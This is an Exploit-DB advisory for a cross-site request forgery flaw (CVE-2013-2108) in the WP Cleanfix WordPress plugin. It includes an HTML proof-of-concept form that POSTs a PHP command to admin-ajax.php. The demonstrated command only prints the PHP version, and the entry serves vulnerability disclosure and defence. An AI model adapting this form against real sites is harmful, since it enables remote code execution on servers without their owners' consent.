WordPress WP Cleanfix Plugin Cross Site Request Forgery Vulnerability

2013-05-16T00:00:00
ID EDB-ID:38520
Type exploitdb
Reporter Enigma Ideas
Modified 2013-05-16T00:00:00

Description

WordPress WP Cleanfix Plugin Cross Site Request Forgery Vulnerability. CVE-2013-2108. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/59940/info

The WP cleanfix plugin for WordPress is prone to a cross-site request-forgery vulnerability.

Exploiting this issue may allow a remote attacker to perform certain unauthorized actions in the context of the affected application. Other attacks are also possible.

WP cleanfix 2.4.4 is vulnerable; other versions may also be affected. 

SRF PoC - generated by Burp Suite Professional -->
  <body>
    <form action="http://www.example.com/wordpress/wordpress-351/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="wpCleanFixAjax" />
      <input type="hidden" name="command" value="echo phpversion()&#59;" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>